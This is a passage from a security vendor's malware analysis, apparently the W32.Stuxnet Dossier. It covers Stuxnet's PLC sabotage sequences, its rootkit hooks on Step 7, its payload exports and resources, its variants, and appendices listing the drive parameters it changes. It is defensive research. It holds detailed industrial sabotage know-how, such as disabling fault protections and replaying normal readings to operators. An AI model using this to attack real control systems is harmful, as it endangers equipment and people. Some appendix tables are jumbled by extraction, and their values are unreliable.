• VALUE contains the new value for the particular parameter. For frequency values, a factor of ten can be ap-
plied if the system was determined to be using deciHz units.
• CW (ControlWord) in sequence A is typically set to 47Fh, which means ‘Run’, but can start by sending 477h
(Stop by Coast) and finishes by using 4FFh (Fault Reset). CW in sequence B is set to 403h.
• REF can range from 100% to -100% represented by 10000 or -10000. This specifies the drive should be
operating at the maximum (100%) frequency either in a forward (positive 10000) or reverse (negative 10000)
direction. The previous direction, before the behavior of the frequency converter drives were hijacked, is main-
tained, but at 100% potentially with a new maximum frequency.
The parameters that are Figure 27
modified and their values are Connections between sequence blocks

in Appendix C. To more clearly
illustrate the behavior of the
injected code, we’ve outlined
the key events that would
occur with an infected 315-2
CPU connected to multiple
CP 342-5 modules each with
31 frequency converter drive
slaves, as shown in the dia-
gram below.
• The PLC is infected.
• Frequency converter slaves
send records to their CP-
342-5 master, building a
frame of 31 records The
CPU records the CP-342-5
addresses.
• The frames are examined and the fields are recorded.
• After approximately 13 days, enough events have been recorded, showing the system has been operating
between 807 Hz and 1210 Hz.
• The infected PLC generates and sends sequence 1 to its frequency converter drives, setting the frequency to
1410Hz.
• Normal operation resumes.
• After approximately 27 days, enough events have been recorded.
• The infected PLC generates and sends sequence 2 to its frequency converter drives, setting the frequency
Page 44
W32.Stuxnet Dossier
Security Response
initially to 2Hz and then 1064Hz.

• The infected PLC generates and sends sequence 1 to its frequency converter drives, setting the frequency to
1410Hz.
• The infected PLC generates and sends sequence 2 to its frequency converter drives, setting the frequency
initially to 2Hz and then 1064Hz.
• …
Sequence C
Stuxnet has a second sabotage strategy targeting S7-417 PLCs. However, the routine is incomplete and the PLC
code, referred to as sequence C, is never purposefully copied onto a PLC or executed. While we can speculate the
PLC code injection was active at a previous time, sequence C itself appears unfinished, contains unimplemented
cases, unused code blocks, and test or debug code. This sequence is more complex than sequences A or B. It
contains more blocks of code and data (32), and also generates data blocks on-the-fly using specific SFC blocks.
The figure below represents sequence C.
Figure 28
Connections Between Blocks, Sequence C
Sequence C Injection
Stuxnet hooks the Step 7 write function, so that whenever someone updates code on the PLC, sequence C is cop-
ied to the PLC. However, because code for a single function in the DLL is missing, sequence C is never properly
activated.
Page 45
W32.Stuxnet Dossier
Security Response
The S7-417 PLC code-installation routine starts when an operator of the target system performs a write opera-
tion to a S7-417 PLC, such as updating code. The SDB7 is read and DB8061 (consisting of Stuxnet-specific data)
is created based on the values in SDB7. However, due to the incomplete function in the DLL, DB8061 is never cre-
ated and the data contained in DB8061 is unknown. In particular, the reference to the function exists, but when
called, a Windows exception occurs. The exception is caught and execution resumes as if DB8061 was created.
Figure 29
Code where an exception is thrown

.text:1000D947 68 70 C8 03 10 push offset unk _ 1003C870
.text:1000D94C 8D 45 FF lea eax, [ebp+var _ 1]
.text:1000D94F 50 push eax
.text:1000D950 E8 93 47 00 00 call _ _ CxxThrowException@8
.text:1000D950
The blocks that compose sequence C are then written to the PLC, including the modifications of SDB0 and SDB4,
and OB80 is created as well, if it did not previously exist. OB80 is the time-event error interrupt and is called if
the maximum cycle time is exceeded. SDB0 is expected to contain records holding CPU configuration informa-
tion. The block is parsed and a static 10-byte long record is inserted into the block. The purpose of this insertion
is unknown. However, contrary to what happens with sequences A and B, no specific values are searched in the
block. Moreover, record 13 of SDB0 can be modified.
The creation timestamp of SDB0 is incremented, and this timestamp is replicated to a specific location in SDB4
for consistency. Sequence C is written and Stuxnet also makes sure an OB80 exists, or else creates an empty
one.
Later, the modification of OB1 (the entry point) that is needed to execute sequence C never occurs. The code to
modify OB1 requires the successful completion of the missing function and since the function throws an excep-
tion, OB1 is not modified and the remaining sequence C code blocks are never executed.
Even if OB1 is modified to execute sequence C, the missing (or an existing unrelated) DB8061 would cause
sequence C to operate improperly. Finally, even if OB1 was modified and DB8061 contained correct values,
unimplemented cases in sequence C would likely cause it to operate unexpectedly. Thus, sequence C appears
unfinished.
Stuxnet also hooks Step 7 to monitor for writes specifically to SDB7. When SDB7 is written, Stuxnet will modify
three bytes in DB8061. Thus, if DB8061 already exists coincidentally on the target PLC, three values will acci-
dentally be modified, potentially corrupting the PLC operation.
The following provides a step-by-step summary of the failed injection process:

1. Read SDB7 Figure 30
2. Attempt to generate DB8061, which fails Eight states in sequence C

3. Modify SDB0, SDB4
4. Copy sequence C blocks to the PLC (do not overwrite existing
blocks)
5. Create OB80 if it does not exist
6. Modify OB1 (does not occur)
Sequence C Behavior
The following describes the behavior of sequence C. However,
these behaviors never happen due to the missing function in the
DLL. Sequence C consists of 40 blocks, 26 containing Stuxnet
code, 4 with standard code blocks, and 10 containing data.
Sequence C consists of a state machine with eight states.

DB8061 is critical to the operation of sequence C and because
DB8061 is missing, the exact behavior of sequence C is unknown.
Page 46
W32.Stuxnet Dossier
Security Response
State 0: Wait
The code expects six groups of 164 peripherals. Based on knowledge from the S7-315 code, these could be six
cascades containing 164 centrifuges each. Stuxnet monitors the groups, and the sum of the activity times for all
groups must be greater than 297 days or for a single group greater than 35 days. In addition, all groups must be
active for at least three days.
State 1: Recording
DB8064 through DB8070 (seven blocks) are created and each contains three sub-blocks for a total of 21 sub-
blocks. The input area of an I/O image is copied into each sub-block with a one second interval between copies,
forming a 21 second recording of the input area. The input area contains information being passed to the PLC
from a peripheral. (For example, the current state of a valve or the temperature of a device.)
State 2 - 6: Sabotage
When the peripheral output is written to, sequence C intercepts the output and ensures it is not written to the
process image output. The output is the instructions the PLC sends to a device to change its operating behavior.
By intercepting the peripheral output, Stuxnet prevents an operator from noticing unauthorized commands sent
to the peripheral.
Each cascade of 164 peripherals is grouped into 15 clusters (0 – 14). Each cluster is affected, but not every cen-
trifuge within a cluster is affected. The following table shows for each group how many peripherals within each
cluster are affected.
Table 7
Affected peripherals within each cluster

Cluster 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
Number
Peripherals in 2 2 4 6 8 10 12 16 20 24 20 16 12 8 4
the Cluster
Peripheral 0-1 2-3 4-7 8-13 14-21 22-31 32-43 44-59 60-79
80- 104- 124- 140- 152- 160-
Number 103 123 139 151 159 163
Peripherals 2 2 2 4 6 8 10 13 14 0 14 13 10 8 4
affected
The particular peripherals within the clusters that are affected are pseudo-randomly chosen. For example, clus-
ter 4 contains 8 peripherals (peripheral 14 to 21). According to the table, 6 out of 8 are affected. One peripheral
within the cluster is pseudo-randomly selected. Let’s say peripheral 20 is selected. Stuxnet will then sabotage
peripherals 20, 21, 14, 15, 16, and 17. If an error occurs when attempting to sabotage one of the peripherals, the
next one is selected. For example, if an error occurs when affecting peripheral 15, then peripherals 16, 17, and
now 18 would be targeted.
A total of 110 peripherals will be affected out of 164.
While this behavior occurs across the four states, state 3 takes place in two parts, with a two minute break in
between. The transition from state 5 to state 6 takes place after 2 minutes, 53 seconds.
State 6 is the state where the writing to the image/peripheral output takes place. This state lasts 6 minutes, 58
seconds.
How the peripherals are affected is unknown. Data is written to the image/peripheral output changing their
behavior, but the data to be written is within DB8061, which is missing.
State 7: Reset
The seven dynamically created data blocks (DB8064-DB8070) are deleted and many of the data values in the
data blocks are reset. State 7 can also be reached if any error occurs or if more than seven seconds elapses
between two OB1 cycles.
Page 47
W32.Stuxnet Dossier
Security Response
A return to state 1 will occur, resulting in a cycle consisting of waiting approximately 35 days, followed by a seven
minute attack phase.
Thus, while the clear intention of the S7-417 code is unknown, key bits may support the theory of a secondary
attack strategy on centrifuge systems within a cascade.
The rootkit
The Stuxnet PLC rootkit code is contained entirely in the fake s7otbxdx.dll. In order to achieve the aim of continu-
ing to exist undetected on the PLC it needs to account for at least the following situations:
• Read requests for its own malicious code blocks.
• Read requests for infected blocks (OB1, OB35, DP_RECV).
• Write requests that could overwrite Stuxnet’s own code.
Stuxnet contains code to monitor and intercept these types of request. The threat modifies these requests so
that Stuxnet’s PLC code is not discovered or damaged. The following list gives some examples of how Stuxnet
uses the hooked exports to handle these situations:
• s7blk_read
Used to read a block, is monitored so that Stuxnet returns:
• The original DP_RECV (kept as FC1869) if DP_RECV is requested.
• An error if the request regards one of its own malicious blocks.
• A cleaned version (disinfected on the fly) copy of OB1 or OB35 if such a block is requested.
• s7blk_write
Used to write a block, is also monitored:
• Requests to OB1/OB35 are modified so that the new version of the block is infected before it’s written.
• Requests to write DP_RECV are also monitored. The first time such a request is issued, the block will be writ-
ten to FC1869 instead of DP_RECV. Next time an error will be raised (since these system blocks are usually
written only once).
• Also note that the injection of sequence C takes place through a s7blk_write operation. Exact conditions are
not determined.
• s7blk_findfirst and s7blk_findnext
Used to enumerate blocks of a PLC. Stuxnet will hide its own blocks by skipping them voluntarily during an
enumeration. Note that Stuxnet recognizes its own blocks by checking a specific value it sets in a block header.
• s7blk_delete
Used to delete blocks, is monitored carefully:
• Requests to delete a SDB may result in PLC disinfection.
• Requests to delete OB are also monitored. It seems the blocks are not necessarily deleted. They could be in-
fected. For instance, deletion of OB80 (used to handle asynchronous error interrupts) can result in an empty
OB80 being written.
Other export hooks

Other exports are hooked to achieve other functions, including PLC information gathering, others remaining
quite obscure at the time of writing:
• s7db_open and s7db_close
Used to obtain information used to create handles to manage a PLC (such a handle is used by APIs that ma-
nipulate the PLC).
• s7ag_read_szl
Used to query PLC information, through a combination of an ID and an index (it can be used for instance to get
the PLC type.) The export modifies the API’s return information if it’s called with specific ID=27, index=0.
• s7_event
The purpose of the original API is unknown. The export can modify block DB8062 of sequence C.
• s7ag_test
• s7ag_link_in
• s7ag_bub_cycl_read_create
Page 48
W32.Stuxnet Dossier
Security Response
• s7ag_bub_read_var
• s7ag_bub_write_var
• s7ag_bub_read_var_seg
• s7ag_bub_write_var_seg
Stuxnet records the previous operating frequencies for the frequency controllers. This data is played back to
WinCC through these hooked functions during the sabotage routines. Thus, instead of the monitoring systems
receiving the anomalous operating frequency data, the monitoring systems believe the frequency converters are
operating as normal.
In addition, OB35 is infected as previously described. When the sabotage routine occurs, OB35 prevents the
original OB35 code from executing. Assuming the original OB35 code initiates a graceful shutdown during cata-
strophic events, even if the operators realize the system is operating abnormally, they will not be able to safely
shutdown the system.
Interestingly, OB35 uses a magic marker value of 0xDEADF007 (possibly to mean Dead Fool or Dead Foot – a
term used when an airplane engine fails) to specify when the routine has reached its final state.
Page 49
W32.Stuxnet Dossier
Security Response
Payload Exports
Export 1
Starts removable drive infection routine as described in the Removable Drive Propagation section. Also starts
the RPC server described in the Peer-to-Peer Communication section.
Export 2
Hooks APIs as described in the Step 7 Project File Infections section.
Export 4
Initialization for export 18, which removes Stuxnet from the system.
Export 5
Checks if MrxCls.sys installed. The purpose of MrxCls.sys is described in the Load Point section.
Export 6
Export 6 is a function to return the version number of the threat read from the configuration data block. The ver-
sion information is stored in the configuration data block at offset 10h.
Export 7
Export 7 simply jumps to export 6.
Export 9
Executes possibly new versions of Stuxnet from infected Step 7 projects as described in the Step 7 Project File
Infections section.
Export 10
Infections section.
Export 14
Main wrapper function for Step 7 project file infections as described in the Step 7 Project File Infections section.
Export 15
Initial entry point described in the Installation section.
Export 16
Main installation routine described in the Installation section.
Export 17
Replaces a Step 7 DLL to infect PLCs as described in the Sabotaging PLCs section.
Page 50
W32.Stuxnet Dossier
Security Response
Export 18
Removes Stuxnet from the system by deleting the following files:
1. Malicious Step 7 DLL
2. Driver files MrxCls.sys and MrxNet.sys
3. oem7A.PNF
4. mdmeric3.pnf
5. mdmcpq3.pnf (Stuxnet’s configuration file)
Export 19
Removable drive infecting routine as described in the Removable Drive Propagation section.
Export 22
Contains all the network spreading routines described in the Network Spreading Routines section.
Export 24
Checks if the system is connected to the Internet. Performs a DNS query on two benign domains in the configu-
ration data (by default windowsupdate.com and msn.com) and updates the configuration data with the status.
Export 27
Contains part of the code for the RPC server described in the Peer-to-Peer Communication section.
Export 28
Contains command and control server functionality described in the Command and Control section.
Export 29
Contains command and control server functionality described in the Command and Control section.
Export 31
Infections section.
Export 32
The same as export 1, except it does not check for an event signal before calling the removable drive spreading
routines and the RPC server code. This export is described in the Removable Drive Propagation section.
Payload Resources
The exports above need to load other files/templates/data to perform their tasks. All of these files are stored in
the resources section of the main .dll file. The function of each resource is discussed in detail here.
Resource 201
Windows rootkit MrxNet.sys driver signed by a compromised Realtek signature described in the Windows Rootkit
Functionality section.
Resource 202
The DLL used in Step 7 project infections as described in the Step 7 Project File Infections section.
Page 51
W32.Stuxnet Dossier
Security Response
Resource 203
CAB file, contains a DLL very similar to resource 202 that is added to WinCC project directories (as described in
Step 7 Project File Infections) and then loaded and executed through SQL statements as described in the Infect-
ing WinCC Machines section.
Resource 205
Encoded configuration file for the load point driver (MrxCls.sys) that is added to the registry. The file specifies
what process should be injected and with what, which is described in the Load Point section.
Resource 207
Stuxnet appended with autorun.inf information. Only in previous variants of Stuxnet.
Resource 208
Step 7 replacement DLL used in infecting PLCs as described in the Sabotaging PLCs section.
Resource 209
25 bytes long data file created in %Windir%\help\winmic.fts
Resource 210
Template PE file used by many exports when creating or injecting executables.
Resource 221
This resource file contains the code to exploit the Microsoft Windows Server Service Vulnerability - MS08-067 as
described in the MS08-067 Windows Server Service vulnerability section.
Resource 222
This resource file contains the code to exploit the Microsoft Windows Print Spooler Vulnerability – MS10-067 as
described in the MS10-061 Print Spooler Zero day vulnerability section.
Resource 231
Checks if the system is connected to the Internet. This resource is only in previous variants of Stuxnet.
Resource 240
Used to build unique .lnk files depending on drives inserted as described in the Removable Drive Propagation
section.
Resource 241
The file WTR4141.tmp signed by Realtek and described in the Removable Drive Propagation section.
Resource 242
Mrxnet.sys rootkit file signed by Realtek.
Resource 250
0-day exploit code that results in an escalation of privilege due to the vulnerability in win32k.sys. Details are
described in the Windows Win32k.sys Local Privilege Escalation vulnerability (MS10-073) section.
Page 52
W32.Stuxnet Dossier
Security Response
Variants
Out of 3,280 collected samples, three distinct variants have been identified. They have compile times of:
• Mon Jun 22 16:31:47 2009
• Mon Mar 01 05:52:35 2010
• Wed Apr 14 10:56:22 2010
A fourth variant is likely to exist as a driver file, signed with the JMicron digital certificate that was found, but the
variant dropping this driver has yet to be recovered.
This document primarily concentrates on the March 2010 variant. The April 2010 variant only differs very slightly
from the March 2010 variant. (For example, increasing the date at which USB spreading stops.) However, the
June 2009 has significant differences from the March and April 2010 samples. The compile times appear ac-
curate based on the infection times seen for each sample. A version number contained within the binary also
corresponds to this chronology.
Table 8
Comparison of Resources
March 2010 June 2009
Resource ID Size Resource ID Size
201 26,616 201 19,840
202 14,848 202 14,336
203 5,237
205 433 205 323
207 520,192
208 298,000 208 298,000
209 25 209 25
210 9,728 210 9,728
221 145,920 221 145,920
222 102,400 222 102,400
231 10,752
240 4,171
241 25,720
242 17,400
250 40,960
As discussed in the Stuxnet Architecture section, Stuxnet segregates its functionality via embedded resources.
The newer variants have more resources, but are smaller in size. Shown below are the resources for both types
shown side by side.
The resources in green were added in the latest version, the resources in red were removed from the older ver-
sion, and the rest of the resources are constant between both old and new samples.
The reason for the difference in size is that Resource ID 207 is absent from the newer versions. Resource 207 is
520kB, so although more resources were added in newer versions of Stuxnet, the sum total of the new resource
sizes is less than 520kB.
The difference in functionality between the June 2009 variant and the March and April 2010 variants is summa-
rized below.
Many of the components are actually identical or are close to identical, having the same functionality with slight
differences in the code.
Page 53
W32.Stuxnet Dossier
Security Response
Table 12
Description of Components
Component June 2009 March 2010
201 Mrxcls.sys rootkit file Unsigned Signed
202 Fake Siemens DLL Same Version info but recompiled
203 DLL inside a .cab file New
205 Data file
207 Large Component Moved to 250
208 Wrapper for s7otbldx.dll Almost identical
209 Data file Identical
210 Loader .dll calls payload Almost identical
221 Network Explorer Identical
222 Network Explorer Identical
231 Internet Connect .dll Moved to main module
240 Link File Template New
241 USB Loader Template New
242 Mrxnet.sys rootkit file New
250 Keyboard Hook & Injector New
Red = resource removed, green = resource added.
Resources 240, 241, and 242 represent the most significant additions between June 2009 and March 2010.
These resources exploit the Microsoft Windows Shortcut ‘LNK’ Files Automatic File Execution Vulnerability (BID
41732) and implement the Windows rootkit to hide files on USB drives.
The June 2009 variant also contained code that was removed in the March 2010 variants. In particular, the June
2009 variants supported Windows 9x and also used autorun.inf to spread on removal drives, instead of the LNK
exploit.
Resource 207 and 231 were dropped from the newer version of Stuxnet. Resource 231 was used to communicate
with the control servers and has the C&C server names stored in plain text within the file. The newer version
of Stuxnet has moved the Internet connection functionality inside the main payload .dll file and has moved the
URLs from inside resource 231 to the installer component, and the URLs are crudely obfuscated. This gives the
attacker the distinct advantage of updating the configuration of each sample without having to rebuild the entire
package with a new resource inside.
Resource 207 has also been removed but at least part of its functionality has been retained. Resource 250 con-
tains code that previously resided inside resource 207, although as you can see from the sizes that resource 250
is much smaller, so some of the functionality of resource 207 has been removed.
Figure 31
Of the more than 3000
Stuxnet Variants
samples recovered, almost
all are 2010 variants. A
very small percentage of
the samples are the 2009
variant. The 2009 variant
may have spread more
slowly and infected far
fewer computers, or the
late discovery may have
meant infections were
either replaced with newer
versions or remediated.
Page 54
W32.Stuxnet Dossier
Security Response
Summary
Stuxnet represents the first of many milestones in malicious code history – it is the first to exploit four 0-day
vulnerabilities, compromise two digital certificates, and inject code into industrial control systems and hide the
code from the operator. Whether Stuxnet will usher in a new generation of malicious code attacks towards real-
world infrastructure—overshadowing the vast majority of current attacks affecting more virtual or individual
assets—or if it is a once- in-a-decade occurrence remains to be seen.
Stuxnet is of such great complexity—requiring significant resources to develop—that few attackers will be
capable of producing a similar threat, to such an extent that we would not expect masses of threats of similar
in sophistication to suddenly appear. However, Stuxnet has highlighted direct-attack attempts on critical infra-
structure are possible and not just theory or movie plotlines.
The real-world implications of Stuxnet are beyond any threat we have seen in the past. Despite the exciting chal-
lenge in reverse engineering Stuxnet and understanding its purpose, Stuxnet is the type of threat we hope to
never see again.
Page 55
W32.Stuxnet Dossier
Security Response
Appendix A
Table 13
Configuration Data
Offset Type Description
+0 Dword Magic
+4 Dword Header size
+8 Dword Validation value
+C Dword Block size
+10 Dword Sequence number
+20 Dword Performance Info
+24 Dword Pointer to Global Config Data
+30 Dword Milliseconds to Wait
+34 Dword Flag
+58 Dword Buffer size
+5c Dword Buffer size
+68 Dword Flag
+6c Dword Flag, if 0, check +70 (if 1, infect USB without timestamp check)
+70 Dword Flag, after checking +6C, if 0, check +78 date
+78 Dword lowdatetime (timestamp before infecting USB)
+7C Dword highdatetime
+80 Dword number of files that must be on the USB key (default 3)
+88 Dword Must be below 80h
+84 Dword Number of Bytes on disk needed - 5Mb
+8c Qword Setup deadline (Jun 24 2012)
+98 Dword Flag
+9c Dword Flag
+A4 Qword Timestamp (start of infection – e.g., 21 days after this time USB infection will stop)
+AC Dword Sleep milliseconds
+b0 Dword Flag
+B4 Qword Timestamp
+c4 Dword Time stamp
+c8 Dword Flag (if 0, infect USB drive, otherwise, uninfect USB drive)
+cc Char[80h] Good domain 1 – windowsupdate.com
+14c Char[80h] Good domain 2 – msn.com
+1cc Char[80h] Command and control server 1
+24c Char[80h] URL for C&C server 1 - index.php
+2cc Char[80h] Command and control server 2
+34c Char[80h] URL for C&C server 2- index.php
Page 56
W32.Stuxnet Dossier
Security Response
Table 13
Configuration Data
+3cc Dword Flag
+3ec Dword Wait time in milliseconds
+3f0 Dword Flag - connectivity check
+3f4 Dword HighDateTime
+3f8 Dword LowDateTime
+3d4 Dword TickCount (hours)
+414 Dword TickCount milliseconds
+418 Char[80h] Step7 project path
+498 Dword pointer to global config
+49c Dword pointer to global config
+4a0 Dword Counter
+59c Dword Flag - 0
+5a0 Dword TickCount Check
+5AC Dword TickCount Check
+5b4 PropagationData block 2
+5f0 PropagationData block 5
+62c PropagationData block 4
+668 PropagationData block 3
+6A4 Dword Flag to control whether WMI jobs should be run
+6A8 Dword Flag to control whether scheduled jobs should be run
+6AC Dword Flag controlling update
+6B4 Dword Flag, disable setup
+6b8 PropagationData block 1
Table 14
Format of a Propagation Data block

+00 Qword Timestamp max time
+08 Qword Timestamp AV definitions max timestamp
+10 Qword Timestamp Kernel DLLs max timestamp
+18 Qword Timestamp secondary time
+20 Dword Day count
+24 Dword Flag check secondary time
+28 Dword Flag check time
+2C Dword Flag check AV definitions time
+30 Dword Flag check Kernel DLLs max timestamp
+34 Dword
+38 Dword
Page 57
W32.Stuxnet Dossier
Security Response
Appendix B
The oem6c.pnf log file
This file is created as %Windir%\inf\oem6c.pnf.
It is encrypted and used to log information about various actions executed by Stuxnet. This data file appears to
have a fixed size of 323,848 bytes. However the payload size is initially empty.
On top of storing paths of recorded or infected Step7 project files, other records of information are stored. Each
record has an ID, a timestamp, and (eventually) data.
Here is a list of records that can be stored to oem6c.pnf:
Communication
• 2DA6h,1—No data. Stored before executing export 28.
• 2DA6h,2—No data. Stored only if export 28 executed successfully.
• 2DA6h,3—Has the initial network packet (to HTTP server) been sent.
S7P/MCP
• 246Eh,1—Unknown. Relates to XUTILS\listen\XR000000.MDX.
• 246Eh,2—Unknown. Relates to GracS\cc_alg.sav.
• 246Eh,3—Filepath S7P.
• 246Eh,4—Filepath S7P.
• 246Eh,4—Filepath MCP.
• 246Eh,5—Filepath MCP.
• 246Eh,6—Recorded Step7 project path.
Network
• F409h, 1—Server names collected from network enumeration.
• F409h, 2—Unknown, index.
• F409h, 3—No data. Related to exploit (failure/success?).
Infection
• 7A2Bh,2—No data. Infection of last removable device success.
• 7A2Bh,5—No data. Infection of last removable device failed.
• 7A2Bh,6—No data. Both files wtr4141/wtr4132 exist on the drive to be infected.
• 7A2Bh,7—No data. Unknown, created on error.
• 7A2Bh,8—No data. Created if not enough space on drive to be infected (less than 5Mb).
Rootkits
• F604h,5—No data. Only if Stuxnet and the rootkits were dropped and installed correctly (installation success).
Page 58
W32.Stuxnet Dossier
Security Response
Appendix C
The following represents the parameters changed on the frequency drives and their values. Descriptions of the
values are provided; however, many of these descriptions—especially for parameters over 1000—may be inaccu-
rate (some clearly are inaccurate). These descriptions are derived from multiple sources and, ultimately, custom
applications can be used on frequency drives that use and specify their own purpose for these values.
Table 15 Table 16
Parameters and values for Vacon drive Parameters and values for Fararo
Parameter Value Possible Description Paya drive
Frames 1.1 Parameter Value Possible Description
813 2 ? Frames 1.1
819 0 117 49
1086 1 Disable stop lock - allows parameters 118 899

adjusting during RUN state (allinone) 119 101
114 0 stop button 120 119
301 0 DIN3 function 116 8000
313 0 RO1 function 116 12000
314 0 RO2 function 116 8000
315 0 output frequency limit 1 supervision 116 16000
346 0 output frequency limit 2 supervision 122 2
348 0 torque limit supervision function 174 301
350 0 reference limit supervision function 168 1
354 0 frequency converter temperature limit 170 201
supervision
113 2
356 0 analogue supervision signal
114 850
700 0 Response to the 4mA reference fault
142 14000 Frequency ?
701 0 Response to external fault
111 1
702 0 Output phase supervision
112 61990
703 0 Earth fault protection
123 0
704 0 Motor thermal protection
107 399
709 0 Stall protection
106 950
713 0 Underload protection
727 1 Response to undervoltage fault
730 0 Input phase supervision
104 14001
732 0 Response to thermistor fault
111 10000
733 0 Response to fieldbus fault
734 0 Response to slot fault
103 10490
740 0 Response to PT100 fault
102 10480
1316 0 Brake fault action (allinone)
166 1
1082 0 SystemBus communication fault re-
sponse (allinone) 173 1
752 0 Speed error fault function 169 1
1353 0 Encoder fault mode (advanced) 112 30000
303 0 reference scaling min value 0 0
304 0 reference scaling maximum value 169 1
305 0 reference inversion
Page 59
W32.Stuxnet Dossier
Security Response
Table 15 Table 16
434 0 fault Parameter Value Possible Description
436 0 warning active 0 0
438 0 reference fault/warning Frames 1.2

439 0 overtemperature warning 123 0
441 0 unrequested direction 112 1
444 0 external control place 102 10
445 0 external brake control 103 500
447 0 output frequency limit 1 supervision 101 10000 Frequency?
448 0 output frequency limit 2 supervision 104 10640 Frequency?
449 0 Reference limit supervision 107 400
450 0 Temperature limit supervision 105 33
451 0 Torque limit supervision 106 100
452 0 Thermistor fault or warning 117 20
463 0 Analogue input supervision limit 118 650
485 0 Scaling of motoring torque limit 119 400
464 0 Analogue output 1 signal selection 120 100
307 0 analogue output function 174 450
472 0 Analogue output 2 function 170 400
478 0 Analogue output 3/ signal selection 113 1
479 0 Analogue output 3/ function 114 750
312 0 digital output 1 function 112 10
486 0 Digital output 1 signal selection 111 10
490 0 Digital output 2 function 142 10640 Frequency?
307 0 analogue output function 173 1
472 0 Analogue output 2 function Frames 2.1
479 0 Analogue output 3/ function 117 49
478 0 Analogue output 3/ signal selection 120 119
484 0 Analogue output 3 offset 116 8000
312 0 digital output 1 function 116 12000
490 0 Digital output 2 function 116 8000
414 0 fault reset 166 1
415 0 acc/dec prohibited 174 301
416 0 DC-braking 168 1
750 1 Cooling monitor 170 201
1213 1 Emergency Stop (allinone) 113 2
Page 60
W32.Stuxnet Dossier
Security Response
Table 15 Table 16
1420 1 Prevention of startup (allinone) Parameter Value Possible Description
399 0 scaling of current limit 114 850
400 0 scaling of DC breaking current 102 1
401 0 scaling of acc/dec time 108 1
405 0 external fault close 109 1
406 1 external fault open 105 280
407 1 run enable 106 281
411 1 control from fieldbus 103 400
409 0 control from I/O terminal 112 1
410 0 control from keyboard 111 30000
107 44 current limit 123 0
107 440 current limit 142 2
509 0 Prohibit frequency area 1/ Low limit 107 380
510 0 Prohibit frequency area 1/ High limit 101 2
511 0 Prohibit frequency area 2/ Low limit 104 500 Frequency?
513 0 Prohibit frequency area 3/ Low limit 173 1
104 19990 deceleration time 1 ? 169 1
503 19990 deceleration time 2 ? Frames 2.2

1541 19990 Selma Fault Word 1 - ? 123 0
1542 19990 Selma Fault Word 2 - ? 111 1
508 0 DC-braking time at stop 104 10640 Frequency?
516 0 DC-braking time at start 103 500
506 1 stop function 101 10000
505 0 start function 102 10
1500 1 Current limit (multimotor) or DIN5 func- 107 400
tion (lift app)
105 33
103 4000 acceleration time 1
106 100
166 1
1531 1 Min frequency (highspeed multimotor)
117 20
125 3 control place
118 650
122 3 fieldbus control reference
119 400
102 1410
120 100
1502 1 Maximum frequency (highspeed mul-
timotor) 122 2
1505 1 Current limit (highspeed multimotor) 174 450
1508 1 Nominal speed of the motor (highspeed 168 4

multimotor) 170 400
1511 1 I/O reference (highspeed multimotor) 113 1
1514 1 Start function (highspeed multimotor) 114 750
108 1500
Page 61
W32.Stuxnet Dossier
Security Response
Table 15 Table 16
1517 1 DC braking time at stop (highspeed Parameter Value Possible Description
multimotor)
109 1200
1520 1 Measured Rs voltage drop (multimotor2)
112 10
1503 1 Acceleration time 1 (highspeed multimo-
111 10
tor)
142 10640 Frequency?
1506 1 Nominal voltage of the motor (highspeed
multimotor) 169 1
1509 1 Nominal current of the motor (high- 173 1
speed multimotor)
1512 1 Analogue output function (highspeed
multimotor)
1515 1 Stop function (highspeed multimotor)
1518 1 Follower drive windong phase shift
(advanced)
600 0 Motor control mode
521 0 Motor control mode 2
1522 1 Analogue output 4 inversion (advanced)
1526 1 DIN5 function (highspeed multimotor)
1525 1 Analogue output 4 scaling (advanced)
1532 0 Max frequency (highspeed multimotor)
1527 0 Analogue output 4 signal selection
(advanced)
110 400 nominal voltage of motor
1519 1064
1516 1063
1520 29990 Measured Rs voltage drop (multimotor2)
1517 29990 DC braking time at stop (highspeed
multimotor)
1519 1410
1516 1400
1517 4000 DC braking time at stop (highspeed
multimotor)
1518 5990 Follower drive windong phase shift
(advanced)
1513 1062
1510 1061
1507 1060
1504 1059
1501 1058
0 0
Page 62
W32.Stuxnet Dossier
Security Response
Table 15
Parameters and values for Vacon drive

Parameter Value Possible Description
Frames 1.2
812 12 Number of stop bits
0 0
Frames 2.1
813 2 ?
819 0
1086 1 Disable stop lock - allows parameters
adjusting during RUN state (allinone)
114 0 stop button
506 0 stop function
315 0 output frequency limit 1 supervision
348 0 torque limit supervision function
350 0 reference limit supervision function
354 0 frequency converter temperature limit
supervision
356 0 analogue supervision signal
700 0 Response to the 4mA reference fault
701 0 Response to external fault
702 0 Output phase supervision
703 0 Earth fault protection
704 0 Motor thermal protection
709 0 Stall protection
713 0 Underload protection
727 1 Response to undervoltage fault
730 0 Input phase supervision
732 0 Response to thermistor fault
733 0 Response to fieldbus fault
734 0 Response to slot fault
740 0 Response to PT100 fault
1316 0 Brake fault action (allinone)
1082 0 SystemBus communication fault re-
sponse (allinone)
752 0 Speed error fault function
1353 0 Encoder fault mode (advanced)
303 0 reference scaling min value
304 0 reference scaling maximum value
305 0 reference inversion
434 0 fault
436 0 warning active
438 0 reference fault/warning
439 0 overtemperature warning
Page 63
W32.Stuxnet Dossier
Security Response
Table 15

441 0 unrequested direction
444 0 external control place
445 0 external brake control
449 0 Reference limit supervision
450 0 Temperature limit supervision
451 0 Torque limit supervision
452 0 Thermistor fault or warning
463 0 Analogue input supervision limit
485 0 Scaling of motoring torque limit
307 0 analogue output function
472 0 Analogue output 2 function
478 0 Analogue output 3/ signal selection
479 0 Analogue output 3/ function
312 0 digital output 1 function
486 0 Digital output 1 signal selection
490 0 Digital output 2 function
489 0 Digital output 2 signal selection
414 0 fault reset
415 0 acc/dec prohibited
416 0 DC-braking
750 1 Cooling monitor
1213 1 Emergency Stop (allinone)
1420 1 Prevention of startup (allinone)
607 0 Overvoltage controller
1267 850 Brake chopper level (advanced)
1262 2 Overvoltage reference selection (ad-
vanced)
520 0 Flux brake
516 0 DC-braking time at start
508 0 DC-braking time at stop
515 1
505 0 start function
104 1 deceleration time 1
Page 64
W32.Stuxnet Dossier
Security Response
Table 15

1541 1 Selma Fault Word 1 - ?

125 3 control place
601 160 switching frequency
399 0 scaling of current limit
400 0 scaling of DC breaking current
401 0 scaling of acc/dec time
405 0 external fault close
406 1 external fault open
407 1 run enable
411 1 control from fieldbus
409 0 control from I/O terminal
410 0 control from keyboard
600 0 Motor control mode
521 0 Motor control mode 2
108 2 U/f ratio selection
101 0 min frequency
107 44 current limit
107 440 current limit
110 380 nominal voltage of motor
606 2800 output voltage at zero frequency
111 80
112 144 nominal speed of motor
